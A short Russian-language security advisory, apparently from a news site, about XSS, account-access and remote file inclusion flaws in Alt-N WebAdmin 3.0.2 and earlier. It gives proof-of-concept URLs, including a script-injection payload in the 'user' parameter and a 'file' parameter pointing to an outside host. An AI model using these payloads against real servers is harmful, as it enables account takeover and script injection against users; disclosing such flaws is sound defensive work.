• Партнер

  • Программа: WebAdmin 3.0.2 и более ранние версии

    Уязвимость позволяет удаленному
    авторизованному пользователю получить
    доступ к другим учетным записям
    пользователей. Удаленный пользователь
    может произвести XSS атаку и получить доступ
    к важным данным пользователей. Alt-N WebAdmin –
    это утилита для удаленного управления
    такими программами как MDaemon, RelayFax, и WorldClient.
    Уязвимость обнаружена в сценарии 'useredit_account.wdm'
    из-за некорректной обработки параметра ‘user’.
    Удаленный пользователь может с помощью
    специально сформированного URL выполнить
    произвольный HTML сценарий в браузере
    целевого пользователя.

    Пример:

    http://[target]/WebAdmin/useredit_account.wdm? user=%3Cscript%3Ealert('test')%3C/script%3E

    Удаленный авторизованный пользователь
    может вызвать сценарий 'useredit_account.wdm' и
    получить доступ к учетным записям других
    пользователей.

    Пример:

    http://[target]/WebAdmin/useredit_account.wdm? user=otheruser@domain

    Удаленный пользователь может загрузить и
    выполнить произвольный HTML код в браузере
    целевого пользователя.

    Пример:

    http://[target]/WebAdmin/modalframe.wdm? file=http://other_server/page.wdm

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии